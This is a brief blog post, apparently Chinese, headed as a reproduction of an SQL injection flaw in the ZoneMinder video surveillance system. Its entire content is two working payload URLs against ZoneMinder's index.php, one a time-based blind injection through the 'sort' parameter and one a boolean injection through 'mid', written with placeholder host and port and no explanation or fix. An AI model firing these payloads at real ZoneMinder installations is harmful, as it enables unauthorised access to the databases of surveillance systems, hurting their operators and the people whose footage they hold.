Babing
Published on 2024-08-30 / 12 Visits
0
0

Z23-1ZoneMinder-视频监控系统-SQL

Z23-1ZoneMinder-视频监控系统-SQL

漏洞复现:

payload:

http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request

Comment